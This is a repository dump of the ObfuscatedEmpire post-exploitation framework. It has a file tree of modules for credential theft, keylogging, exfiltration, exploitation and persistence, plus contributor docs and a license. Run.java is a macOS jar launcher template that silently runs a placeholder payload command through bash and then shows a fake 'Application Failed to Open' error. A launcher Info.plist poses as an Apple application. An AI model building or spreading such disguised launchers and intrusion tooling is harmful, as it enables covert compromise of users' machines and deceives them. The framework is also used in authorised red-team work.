├── .github ├── CONTRIBUTING.md └── ISSUE_TEMPLATE.md ├── .gitignore ├── LICENSE ├── README.md ├── changelog ├── data ├── agent │ ├── agent.ps1 │ ├── agent.py │ └── stagers │ │ ├── dropbox.ps1 │ │ ├── dropbox.py │ │ ├── http.ps1 │ │ ├── http.py │ │ ├── http_com.ps1 │ │ └── http_mapi.ps1 ├── misc │ ├── ReflectivePick_x64_orig.dll │ ├── ReflectivePick_x86_orig.dll │ ├── Run.java │ ├── apptemplateResources │ │ ├── empty │ │ │ └── macho │ │ ├── icon │ │ │ └── stormtrooper.icns │ │ ├── x64 │ │ │ └── launcher.app │ │ │ │ └── Contents │ │ │ │ ├── Info.plist │ │ │ │ ├── MacOS │ │ │ │ └── launcher │ │ │ │ ├── PkgInfo │ │ │ │ ├── Resources │ │ │ │ └── Base.lproj │ │ │ │ │ └── MainMenu.nib │ │ │ │ └── _CodeSignature │ │ │ │ └── CodeResources │ │ └── x86 │ │ │ └── launcher.app │ │ │ └── Contents │ │ │ ├── Info.plist │ │ │ ├── MacOS │ │ │ └── launcher │ │ │ ├── PkgInfo │ │ │ ├── Resources │ │ │ └── Base.lproj │ │ │ │ └── MainMenu.nib │ │ │ └── _CodeSignature │ │ │ └── CodeResources │ ├── hijackers │ │ ├── template.dylib │ │ └── template64.dylib │ ├── hop.php │ ├── inactive_modules │ │ └── redirector.py │ ├── machotemplate │ ├── pkgbuild │ │ ├── expand │ │ │ └── PackageInfo │ │ ├── root │ │ │ └── Applications │ │ │ │ └── test │ │ └── scripts │ │ │ └── postinstall │ ├── templateLauncher.dylib │ ├── templateLauncher64.dylib │ ├── templateSource │ │ ├── Dylib.c │ │ └── macho.m │ └── xar-1.5.2.tar.gz ├── module_source │ ├── code_execution │ │ ├── Invoke-DllInjection.ps1 │ │ ├── Invoke-MetasploitPayload.ps1 │ │ ├── Invoke-Ntsd.ps1 │ │ ├── Invoke-ReflectivePEInjection.ps1 │ │ ├── Invoke-Shellcode.ps1 │ │ ├── Invoke-ShellcodeMSIL.ps1 │ │ ├── ntsd_x64.exe │ │ ├── ntsd_x86.exe │ │ ├── ntsdexts_x64.dll │ │ └── ntsdexts_x86.dll │ ├── collection │ │ ├── Get-BrowserData.ps1 │ │ ├── Get-ChromeDump.ps1 │ │ ├── Get-ClipboardContents.ps1 │ │ ├── Get-FoxDump.ps1 │ │ ├── Get-IndexedItem.ps1 │ │ ├── Get-Keystrokes.ps1 │ │ ├── Get-SQLColumnSampleData.ps1 │ │ ├── Get-SQLQuery.ps1 │ │ ├── 
Get-Screenshot.ps1 │ │ ├── Get-USBKeystrokes.ps1 │ │ ├── Invoke-Inveigh.ps1 │ │ ├── Invoke-NetRipper.ps1 │ │ ├── Invoke-NinjaCopy.ps1 │ │ ├── Out-Minidump.ps1 │ │ └── vaults │ │ │ ├── KeePassConfig.ps1 │ │ │ └── KeeThief.ps1 │ ├── credentials │ │ ├── Get-VaultCredential.ps1 │ │ ├── Invoke-CredentialInjection.ps1 │ │ ├── Invoke-DCSync.ps1 │ │ ├── Invoke-Kerberoast.ps1 │ │ ├── Invoke-Mimikatz.ps1 │ │ ├── Invoke-PowerDump.ps1 │ │ ├── Invoke-SessionGopher.ps1 │ │ ├── Invoke-TokenManipulation.ps1 │ │ └── dumpCredStore.ps1 │ ├── exfil │ │ ├── Invoke-EgressCheck.ps1 │ │ ├── Invoke-ExfilDataToGitHub.ps1 │ │ └── Invoke-PostExfil.ps1 │ ├── exploitation │ │ ├── Exploit-EternalBlue.ps1 │ │ ├── Exploit-JBoss.ps1 │ │ └── Exploit-Jenkins.ps1 │ ├── fun │ │ ├── Invoke-Thunderstruck.ps1 │ │ ├── Invoke-VoiceTroll.ps1 │ │ └── Set-Wallpaper.ps1 │ ├── lateral_movement │ │ ├── Invoke-DCOM.ps1 │ │ ├── Invoke-ExecuteMSBuild.ps1 │ │ ├── Invoke-InveighRelay.ps1 │ │ ├── Invoke-PsExec.ps1 │ │ ├── Invoke-SQLOSCmd.ps1 │ │ └── Invoke-SSHCommand.ps1 │ ├── management │ │ ├── Invoke-PSInject.ps1 │ │ ├── Invoke-ReflectivePEInjection.ps1 │ │ ├── Invoke-RunAs.ps1 │ │ ├── Invoke-Vnc.ps1 │ │ ├── MailRaider.ps1 │ │ ├── New-HoneyHash.ps1 │ │ └── Set-MacAttribute.ps1 │ ├── persistence │ │ ├── Get-SecurityPackages.ps1 │ │ ├── Install-SSP.ps1 │ │ ├── Invoke-BackdoorLNK.ps1 │ │ ├── Persistence.psm1 │ │ └── PowerBreach.ps1 │ ├── privesc │ │ ├── Get-GPPPassword.ps1 │ │ ├── Get-SiteListPassword.ps1 │ │ ├── Get-System.ps1 │ │ ├── Invoke-BypassUAC.ps1 │ │ ├── Invoke-BypassUACTokenManipulation.ps1 │ │ ├── Invoke-EnvBypass.ps1 │ │ ├── Invoke-EventVwrBypass.ps1 │ │ ├── Invoke-FodHelperBypass.ps1 │ │ ├── Invoke-MS16032.ps1 │ │ ├── Invoke-MS16135.ps1 │ │ ├── Invoke-SDCLTBypass.ps1 │ │ ├── Invoke-Tater.ps1 │ │ ├── Invoke-WScriptBypassUAC.ps1 │ │ └── PowerUp.ps1 │ ├── python │ │ └── lateral_movement │ │ │ └── socks_source.py │ ├── recon │ │ ├── Find-Fruit.ps1 │ │ ├── Get-SQLServerLoginDefaultPw.ps1 │ │ └── HTTP-Login.ps1 
│ ├── situational_awareness │ │ ├── host │ │ │ ├── Find-TrustedDocuments.ps1 │ │ │ ├── Get-ComputerDetails.ps1 │ │ │ ├── Get-SystemDNSServer.ps1 │ │ │ ├── Invoke-Paranoia.ps1 │ │ │ ├── Invoke-WinEnum.ps1 │ │ │ └── Start-MonitorTCPConnections.ps1 │ │ └── network │ │ │ ├── BloodHound.ps1 │ │ │ ├── Get-SPN.ps1 │ │ │ ├── Get-SQLInstanceDomain.ps1 │ │ │ ├── Get-SQLServerInfo.ps1 │ │ │ ├── Invoke-ARPScan.ps1 │ │ │ ├── Invoke-Portscan.ps1 │ │ │ ├── Invoke-ReverseDNSLookup.ps1 │ │ │ ├── Invoke-SMBAutoBrute.ps1 │ │ │ ├── Invoke-SmbScanner.ps1 │ │ │ └── powerview.ps1 │ └── trollsploit │ │ └── Get-RickAstley.ps1 ├── obfuscated_module_source │ ├── code_execution │ │ └── .gitignore │ ├── collection │ │ ├── .gitignore │ │ └── vaults │ │ │ └── .gitignore │ ├── credentials │ │ └── .gitignore │ ├── exfil │ │ └── .gitignore │ ├── exploitation │ │ └── .gitignore │ ├── fun │ │ └── .gitignore │ ├── lateral_movement │ │ └── .gitignore │ ├── management │ │ └── .gitignore │ ├── persistence │ │ └── .gitignore │ ├── privesc │ │ └── .gitignore │ ├── recon │ │ └── .gitignore │ ├── situational_awareness │ │ ├── .gitignore │ │ ├── host │ │ │ └── .gitignore │ │ └── network │ │ │ └── .gitignore │ └── trollsploit │ │ └── .gitignore └── profiles │ ├── comfoo.txt │ ├── fiesta.txt │ ├── pitty_tiger.txt │ └── zeus.txt ├── empire ├── lib ├── __init__.py ├── common │ ├── __init__.py │ ├── agents.py │ ├── credentials.py │ ├── empire.py │ ├── encryption.py │ ├── helpers.py │ ├── http.py │ ├── listeners.py │ ├── messages.py │ ├── modules.py │ ├── packets.py │ ├── pylnk.py │ └── stagers.py ├── listeners │ ├── dbx.py │ ├── http.py │ ├── http_com.py │ ├── http_foreign.py │ ├── http_hop.py │ ├── http_mapi.py │ ├── meterpreter.py │ └── template.py ├── modules │ ├── exfiltration │ │ └── Invoke_ExfilDataToGitHub.py │ ├── external │ │ └── generate_agent.py │ ├── powershell │ │ ├── code_execution │ │ │ ├── invoke_dllinjection.py │ │ │ ├── invoke_metasploitpayload.py │ │ │ ├── invoke_ntsd.py │ │ │ ├── 
invoke_reflectivepeinjection.py │ │ │ ├── invoke_shellcode.py │ │ │ └── invoke_shellcodemsil.py │ │ ├── collection │ │ │ ├── ChromeDump.py │ │ │ ├── FoxDump.py │ │ │ ├── USBKeylogger.py │ │ │ ├── WebcamRecorder.py │ │ │ ├── browser_data.py │ │ │ ├── clipboard_monitor.py │ │ │ ├── file_finder.py │ │ │ ├── find_interesting_file.py │ │ │ ├── get_indexed_item.py │ │ │ ├── get_sql_column_sample_data.py │ │ │ ├── get_sql_query.py │ │ │ ├── inveigh.py │ │ │ ├── keylogger.py │ │ │ ├── minidump.py │ │ │ ├── netripper.py │ │ │ ├── ninjacopy.py │ │ │ ├── packet_capture.py │ │ │ ├── prompt.py │ │ │ ├── screenshot.py │ │ │ └── vaults │ │ │ │ ├── add_keepass_config_trigger.py │ │ │ │ ├── find_keepass_config.py │ │ │ │ ├── get_keepass_config_trigger.py │ │ │ │ ├── keethief.py │ │ │ │ └── remove_keepass_config_trigger.py │ │ ├── credentials │ │ │ ├── credential_injection.py │ │ │ ├── enum_cred_store.py │ │ │ ├── invoke_kerberoast.py │ │ │ ├── mimikatz │ │ │ │ ├── cache.py │ │ │ │ ├── certs.py │ │ │ │ ├── command.py │ │ │ │ ├── dcsync.py │ │ │ │ ├── dcsync_hashdump.py │ │ │ │ ├── extract_tickets.py │ │ │ │ ├── golden_ticket.py │ │ │ │ ├── logonpasswords.py │ │ │ │ ├── lsadump.py │ │ │ │ ├── mimitokens.py │ │ │ │ ├── pth.py │ │ │ │ ├── purge.py │ │ │ │ ├── sam.py │ │ │ │ ├── silver_ticket.py │ │ │ │ └── trust_keys.py │ │ │ ├── powerdump.py │ │ │ ├── sessiongopher.py │ │ │ ├── tokens.py │ │ │ └── vault_credential.py │ │ ├── exfiltration │ │ │ ├── egresscheck.py │ │ │ └── exfil_dropbox.py │ │ ├── exploitation │ │ │ ├── exploit_eternalblue.py │ │ │ ├── exploit_jboss.py │ │ │ └── exploit_jenkins.py │ │ ├── lateral_movement │ │ │ ├── inveigh_relay.py │ │ │ ├── invoke_dcom.py │ │ │ ├── invoke_executemsbuild.py │ │ │ ├── invoke_psexec.py │ │ │ ├── invoke_psremoting.py │ │ │ ├── invoke_sqloscmd.py │ │ │ ├── invoke_sshcommand.py │ │ │ ├── invoke_wmi.py │ │ │ ├── invoke_wmi_debugger.py │ │ │ ├── jenkins_script_console.py │ │ │ └── new_gpo_immediate_task.py │ │ ├── management │ │ │ ├── 
disable_rdp.py │ │ │ ├── downgrade_account.py │ │ │ ├── enable_multi_rdp.py │ │ │ ├── enable_rdp.py │ │ │ ├── get_domain_sid.py │ │ │ ├── honeyhash.py │ │ │ ├── invoke_script.py │ │ │ ├── lock.py │ │ │ ├── logoff.py │ │ │ ├── mailraider │ │ │ │ ├── disable_security.py │ │ │ │ ├── get_emailitems.py │ │ │ │ ├── get_subfolders.py │ │ │ │ ├── mail_search.py │ │ │ │ ├── search_gal.py │ │ │ │ ├── send_mail.py │ │ │ │ └── view_email.py │ │ │ ├── psinject.py │ │ │ ├── reflective_inject.py │ │ │ ├── restart.py │ │ │ ├── runas.py │ │ │ ├── sid_to_user.py │ │ │ ├── spawn.py │ │ │ ├── spawnas.py │ │ │ ├── switch_listener.py │ │ │ ├── timestomp.py │ │ │ ├── user_to_sid.py │ │ │ ├── vnc.py │ │ │ ├── wdigest_downgrade.py │ │ │ └── zipfolder.py │ │ ├── persistence │ │ │ ├── elevated │ │ │ │ ├── registry.py │ │ │ │ ├── schtasks.py │ │ │ │ ├── wmi.py │ │ │ │ └── wmi_updater.py │ │ │ ├── misc │ │ │ │ ├── add_netuser.py │ │ │ │ ├── add_sid_history.py │ │ │ │ ├── debugger.py │ │ │ │ ├── disable_machine_acct_change.py │ │ │ │ ├── get_ssps.py │ │ │ │ ├── install_ssp.py │ │ │ │ ├── memssp.py │ │ │ │ └── skeleton_key.py │ │ │ ├── powerbreach │ │ │ │ ├── deaduser.py │ │ │ │ ├── eventlog.py │ │ │ │ └── resolver.py │ │ │ └── userland │ │ │ │ ├── backdoor_lnk.py │ │ │ │ ├── registry.py │ │ │ │ └── schtasks.py │ │ ├── privesc │ │ │ ├── ask.py │ │ │ ├── bypassuac.py │ │ │ ├── bypassuac_env.py │ │ │ ├── bypassuac_eventvwr.py │ │ │ ├── bypassuac_fodhelper.py │ │ │ ├── bypassuac_sdctlbypass.py │ │ │ ├── bypassuac_tokenmanipulation.py │ │ │ ├── bypassuac_wscript.py │ │ │ ├── getsystem.py │ │ │ ├── gpp.py │ │ │ ├── mcafee_sitelist.py │ │ │ ├── ms16-032.py │ │ │ ├── ms16-135.py │ │ │ ├── powerup │ │ │ │ ├── allchecks.py │ │ │ │ ├── find_dllhijack.py │ │ │ │ ├── service_exe_restore.py │ │ │ │ ├── service_exe_stager.py │ │ │ │ ├── service_exe_useradd.py │ │ │ │ ├── service_stager.py │ │ │ │ ├── service_useradd.py │ │ │ │ └── write_dllhijacker.py │ │ │ └── tater.py │ │ ├── recon │ │ │ ├── find_fruit.py │ 
│ │ ├── get_sql_server_login_default_pw.py │ │ │ └── http_login.py │ │ ├── situational_awareness │ │ │ ├── host │ │ │ │ ├── antivirusproduct.py │ │ │ │ ├── computerdetails.py │ │ │ │ ├── dnsserver.py │ │ │ │ ├── findtrusteddocuments.py │ │ │ │ ├── get_pathacl.py │ │ │ │ ├── get_proxy.py │ │ │ │ ├── get_uaclevel.py │ │ │ │ ├── monitortcpconnections.py │ │ │ │ ├── paranoia.py │ │ │ │ └── winenum.py │ │ │ └── network │ │ │ │ ├── arpscan.py │ │ │ │ ├── bloodhound.py │ │ │ │ ├── get_exploitable_system.py │ │ │ │ ├── get_spn.py │ │ │ │ ├── get_sql_instance_domain.py │ │ │ │ ├── get_sql_server_info.py │ │ │ │ ├── portscan.py │ │ │ │ ├── powerview │ │ │ │ ├── find_computer_field.py │ │ │ │ ├── find_foreign_group.py │ │ │ │ ├── find_foreign_user.py │ │ │ │ ├── find_gpo_computer_admin.py │ │ │ │ ├── find_gpo_location.py │ │ │ │ ├── find_localadmin_access.py │ │ │ │ ├── find_managed_security_group.py │ │ │ │ ├── find_user_field.py │ │ │ │ ├── get_cached_rdpconnection.py │ │ │ │ ├── get_computer.py │ │ │ │ ├── get_dfs_share.py │ │ │ │ ├── get_domain_controller.py │ │ │ │ ├── get_domain_policy.py │ │ │ │ ├── get_domain_trust.py │ │ │ │ ├── get_fileserver.py │ │ │ │ ├── get_forest.py │ │ │ │ ├── get_forest_domain.py │ │ │ │ ├── get_gpo.py │ │ │ │ ├── get_gpo_computer.py │ │ │ │ ├── get_group.py │ │ │ │ ├── get_group_member.py │ │ │ │ ├── get_localgroup.py │ │ │ │ ├── get_loggedon.py │ │ │ │ ├── get_object_acl.py │ │ │ │ ├── get_ou.py │ │ │ │ ├── get_rdp_session.py │ │ │ │ ├── get_session.py │ │ │ │ ├── get_site.py │ │ │ │ ├── get_subnet.py │ │ │ │ ├── get_user.py │ │ │ │ ├── map_domain_trust.py │ │ │ │ ├── process_hunter.py │ │ │ │ ├── set_ad_object.py │ │ │ │ ├── share_finder.py │ │ │ │ └── user_hunter.py │ │ │ │ ├── reverse_dns.py │ │ │ │ ├── smbautobrute.py │ │ │ │ └── smbscanner.py │ │ └── trollsploit │ │ │ ├── get_schwifty.py │ │ │ ├── message.py │ │ │ ├── process_killer.py │ │ │ ├── rick_ascii.py │ │ │ ├── rick_astley.py │ │ │ ├── thunderstruck.py │ │ │ ├── voicetroll.py │ 
│ │ ├── wallpaper.py │ │ │ └── wlmdr.py │ ├── powershell_template.py │ ├── python │ │ ├── collection │ │ │ ├── linux │ │ │ │ ├── hashdump.py │ │ │ │ ├── keylogger.py │ │ │ │ ├── mimipenguin.py │ │ │ │ ├── pillage_user.py │ │ │ │ ├── sniffer.py │ │ │ │ └── xkeylogger.py │ │ │ └── osx │ │ │ │ ├── browser_dump.py │ │ │ │ ├── clipboard.py │ │ │ │ ├── hashdump.py │ │ │ │ ├── imessage_dump.py │ │ │ │ ├── kerberosdump.py │ │ │ │ ├── keychaindump.py │ │ │ │ ├── keychaindump_chainbreaker.py │ │ │ │ ├── keylogger.py │ │ │ │ ├── native_screenshot.py │ │ │ │ ├── pillage_user.py │ │ │ │ ├── prompt.py │ │ │ │ ├── screensaver_alleyoop.py │ │ │ │ ├── screenshot.py │ │ │ │ ├── search_email.py │ │ │ │ ├── sniffer.py │ │ │ │ └── webcam.py │ │ ├── exploit │ │ │ └── web │ │ │ │ └── jboss_jmx.py │ │ ├── lateral_movement │ │ │ └── multi │ │ │ │ ├── ssh_command.py │ │ │ │ └── ssh_launcher.py │ │ ├── management │ │ │ ├── multi │ │ │ │ ├── kerberos_inject.py │ │ │ │ ├── socks.py │ │ │ │ └── spawn.py │ │ │ └── osx │ │ │ │ ├── screen_sharing.py │ │ │ │ └── shellcodeinject64.py │ │ ├── persistence │ │ │ ├── multi │ │ │ │ └── crontab.py │ │ │ └── osx │ │ │ │ ├── CreateHijacker.py │ │ │ │ ├── RemoveDaemon.py │ │ │ │ ├── launchdaemonexecutable.py │ │ │ │ ├── loginhook.py │ │ │ │ └── mail.py │ │ ├── privesc │ │ │ ├── linux │ │ │ │ ├── linux_priv_checker.py │ │ │ │ └── unix_privesc_check.py │ │ │ ├── multi │ │ │ │ ├── bashdoor.py │ │ │ │ └── sudo_spawn.py │ │ │ ├── osx │ │ │ │ ├── dyld_print_to_file.py │ │ │ │ └── piggyback.py │ │ │ └── windows │ │ │ │ └── get_gpppasswords.py │ │ ├── situational_awareness │ │ │ ├── host │ │ │ │ ├── multi │ │ │ │ │ ├── SuidGuidSearch.py │ │ │ │ │ └── WorldWriteableFileSearch.py │ │ │ │ └── osx │ │ │ │ │ ├── HijackScanner.py │ │ │ │ │ └── situational_awareness.py │ │ │ └── network │ │ │ │ ├── active_directory │ │ │ │ ├── dscl_get_groupmembers.py │ │ │ │ ├── dscl_get_groups.py │ │ │ │ ├── dscl_get_users.py │ │ │ │ ├── get_computers.py │ │ │ │ ├── 
get_domaincontrollers.py │ │ │ │ ├── get_fileservers.py │ │ │ │ ├── get_groupmembers.py │ │ │ │ ├── get_groupmemberships.py │ │ │ │ ├── get_groups.py │ │ │ │ ├── get_ous.py │ │ │ │ ├── get_userinformation.py │ │ │ │ └── get_users.py │ │ │ │ ├── dcos │ │ │ │ ├── chronos_api_add_job.py │ │ │ │ ├── chronos_api_delete_job.py │ │ │ │ ├── chronos_api_start_job.py │ │ │ │ ├── etcd_crawler.py │ │ │ │ ├── marathon_api_create_start_app.py │ │ │ │ └── marathon_api_delete_app.py │ │ │ │ ├── find_fruit.py │ │ │ │ ├── gethostbyname.py │ │ │ │ ├── http_rest_api.py │ │ │ │ ├── port_scan.py │ │ │ │ └── smb_mount.py │ │ └── trollsploit │ │ │ └── osx │ │ │ ├── change_background.py │ │ │ ├── login_message.py │ │ │ ├── say.py │ │ │ └── thunderstruck.py │ ├── python_jobs_template.py │ └── python_template.py ├── powershell │ └── Invoke-Obfuscation │ │ ├── Invoke-Obfuscation.ps1 │ │ ├── Invoke-Obfuscation.psd1 │ │ ├── Invoke-Obfuscation.psm1 │ │ ├── LICENSE │ │ ├── Out-EncodedAsciiCommand.ps1 │ │ ├── Out-EncodedBXORCommand.ps1 │ │ ├── Out-EncodedBinaryCommand.ps1 │ │ ├── Out-EncodedHexCommand.ps1 │ │ ├── Out-EncodedOctalCommand.ps1 │ │ ├── Out-ObfuscatedStringCommand.ps1 │ │ ├── Out-ObfuscatedTokenCommand.ps1 │ │ ├── Out-PowerShellLauncher.ps1 │ │ ├── Out-SecureStringCommand.ps1 │ │ └── README.md └── stagers │ ├── multi │ ├── bash.py │ ├── launcher.py │ ├── pyinstaller.py │ └── war.py │ ├── osx │ ├── applescript.py │ ├── application.py │ ├── ducky.py │ ├── dylib.py │ ├── jar.py │ ├── launcher.py │ ├── macho.py │ ├── macro.py │ ├── pkg.py │ ├── safari_launcher.py │ └── teensy.py │ └── windows │ ├── bunny.py │ ├── dll.py │ ├── ducky.py │ ├── hta.py │ ├── launcher_bat.py │ ├── launcher_lnk.py │ ├── launcher_sct.py │ ├── launcher_vbs.py │ ├── macro.py │ ├── macroless_msword.py │ └── teensy.py └── setup ├── cert.sh ├── install.sh ├── reset.sh └── setup_database.py /.github/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How To Contribute 
2 | 3 | Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions. 4 | 5 | 6 | ## Creating Github Issues 7 | 8 | Before opening an issue, please review the existing Empire issues to see whether the error has already been fixed in the development branch, or whether we chose not to fix it. 9 | 10 | The more information you provide in a Github issue, the easier it will be for us to track down and fix the problem: 11 | 12 | * Please provide the version of Empire you are using. 13 | * Please provide the OS and Python versions that you are using. 14 | * Please describe the expected behavior and the encountered error. 15 | * The more detail the better! 16 | * Include any actions taken just prior to the error. 17 | * Please post a screenshot of the error, a link to a Pastebin dump of the error, or embedded text of the error. 18 | * Any additional information. 19 | 20 | 21 | ## Submitting Modules 22 | 23 | * Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master. 24 | * Base modules on the template at [./modules/template.py](https://github.com/PowerShellEmpire/Empire/blob/dev/lib/modules/template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111). 25 | * Cite previous work in the **'Comments'** module section. 
26 | * If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95). 27 | * Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions. 28 | * PowerShell Version 2 compatibility is **STRONGLY** preferred. 29 | * TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly. 30 | * For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md). -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ## Empire Version 2 | 3 | 4 | ## OS Information (Linux flavor, Python version) 5 | 6 | 7 | ## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better. 
8 | 9 | 10 | ## Screenshot of error, embedded text output, or Pastebin link to the error 11 | 12 | 13 | ## Any additional information 14 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | data/empire.db 2 | data/empire-chain.pem 3 | data/empire-priv.key 4 | empire.debug 5 | *.pyc 6 | downloads/* 7 | .vscode/* 8 | *.txt 9 | LastTask* 10 | data/obfuscated_module_source/*.ps1 11 | data/misc/ToObfuscate.ps1 12 | data/misc/Obfuscated.ps1 13 | setup/xar* 14 | setup/bomutils/* 15 | .venv 16 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2017, Will Schroeder, Justin Warner, Matt Nelson, Steve Borosh, Alex Rymdeko-harvey, Chris Ross 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation 12 | and/or other materials provided with the distribution. 13 | 14 | * Neither the name of Empire nor the names of its 15 | contributors may be used to endorse or promote products derived from 16 | this software without specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | 29 | 
-------------------------------------------------------------------------------- /data/misc/ReflectivePick_x64_orig.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/ReflectivePick_x64_orig.dll 
-------------------------------------------------------------------------------- /data/misc/ReflectivePick_x86_orig.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/ReflectivePick_x86_orig.dll 
-------------------------------------------------------------------------------- /data/misc/Run.java: -------------------------------------------------------------------------------- 
package com.installer.apple;

import java.io.*;
import javax.swing.JOptionPane;

/**
 * Source template for a jar launcher; presumably consumed by the osx jar stager
 * (lib/stagers/osx/jar.py in the tree above) -- confirm there, it is not visible here.
 * The literal "LAUNCHER" is a placeholder: nothing in this file replaces it, so the
 * substitution must happen wherever the jar is generated.
 *
 * Host-side view: everything this class does is a JVM process spawning
 * "/bin/bash -c <command>" followed by a single Swing dialog.
 */
public class Run{
    /**
     * Entry point. Runs the placeholder command through /bin/bash -c and then shows an
     * "Application Failed to Open" dialog whether or not the command did anything
     * (presumably so the launch looks like a failed application start to the user).
     *
     * @param args ignored
     */
    public static void main(String[] args){

        // argv for Runtime.exec: the whole placeholder is handed to bash as one -c argument.
        String[] cmd = {
            "/bin/bash",
            "-c",
            "LAUNCHER"
        };

        try {
            // The child is never waited on and its exit status is never read; `p` is unused.
            Process p = Runtime.getRuntime().exec(cmd);
            // Shown unconditionally once exec() returns, i.e. regardless of the child's outcome.
            // Uses the INFORMATION_MESSAGE icon even though the dialog title is "Error".
            JOptionPane.showMessageDialog(null, "Application Failed to Open", "Error", JOptionPane.INFORMATION_MESSAGE);
        }
        // A failed exec (e.g. /bin/bash not found) is swallowed silently: no dialog, no log.
        catch (IOException e){}
    }
} --------------------------------------------------------------------------------
/data/misc/apptemplateResources/empty/macho: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/empty/macho -------------------------------------------------------------------------------- /data/misc/apptemplateResources/icon/stormtrooper.icns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/icon/stormtrooper.icns -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x64/launcher.app/Contents/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BuildMachineOSBuild 6 | 15G31 7 | CFBundleDevelopmentRegion 8 | en 9 | CFBundleExecutable 10 | launcher 11 | CFBundleIdentifier 12 | com.apple.launcher 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | launcher 17 | CFBundlePackageType 18 | APPL 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleSignature 22 | ???? 23 | CFBundleSupportedPlatforms 24 | 25 | MacOSX 26 | 27 | CFBundleVersion 28 | 1 29 | DTCompiler 30 | com.apple.compilers.llvm.clang.1_0 31 | DTPlatformBuild 32 | 7D1014 33 | DTPlatformVersion 34 | GM 35 | DTSDKBuild 36 | 15E60 37 | DTSDKName 38 | macosx10.11 39 | DTXcode 40 | 0731 41 | DTXcodeBuild 42 | 7D1014 43 | LSMinimumSystemVersion 44 | 10.11 45 | LSUIElement 46 | 47 | NSHumanReadableCopyright 48 | Copyright © 2016 Apple. All rights reserved. 
49 | NSMainNibFile 50 | MainMenu 51 | NSPrincipalClass 52 | NSApplication 53 | 54 | 55 | -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x64/launcher.app/Contents/PkgInfo: -------------------------------------------------------------------------------- 1 | APPL???? -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x64/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x64/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib -------------------------------------------------------------------------------- /data/misc/apptemplateResources/x64/launcher.app/Contents/_CodeSignature/CodeResources: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | files 6 | 7 | Resources/Base.lproj/MainMenu.nib 8 | 9 | hash 10 | 11 | qzM7hpyjTG1HuQPURuKEoahDSKQ= 12 | 13 | optional 14 | 15 | 16 | 17 | files2 18 | 19 | Resources/Base.lproj/MainMenu.nib 20 | 21 | hash 22 | 23 | 